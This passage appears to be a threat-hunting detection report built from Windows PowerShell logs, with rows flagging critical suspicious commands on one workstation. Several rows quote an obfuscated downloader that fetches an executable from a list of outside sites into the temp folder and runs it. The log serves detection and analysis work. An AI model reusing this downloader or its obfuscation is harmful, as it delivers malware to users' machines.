(('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 789 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F 
[CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=27 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F 
[CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Get-Item): "Get-Item" +ParameterBinding(Get-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype 
DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 787 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = 
(('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=23 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = 
(('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Object): "New-Object" +ParameterBinding(New-Object): name="TypeName"; value="neT.WEbcLiENt" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line 
($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 792 + + + + + Windows PowerShell + DESKTOP-RIPCLIP + + + + + $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype 
DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'), DetailSequence=1 + DetailTotal=1 + + SequenceNumber=33 + + UserId=DESKTOP-RIPCLIP\Clippy + HostName=ConsoleHost + HostVersion=5.1.19041.1 + HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7 + HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + EngineVersion=5.1.19041.1 + RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3 + PipelineId=6 + ScriptName= + CommandLine=$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype 
DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(Invoke-Item): "Invoke-Item" +ParameterBinding(Invoke-Item): name="Path"; value="C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe" + + + +",DESKTOP-RIPCLIP,Windows PowerShell +Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.083919,2020-08-26T09:09:29.083919+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include 
(Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,New-Item,\Windows\System32) in event with Command Line ($Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0'),CommandInvocation(New-Item): "New-Item") and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800," + + + + + 800 + 0 + 4 + 8 + 0 + 0x80000000000000 + + + 786 + + + + + Windows PowerShell + 
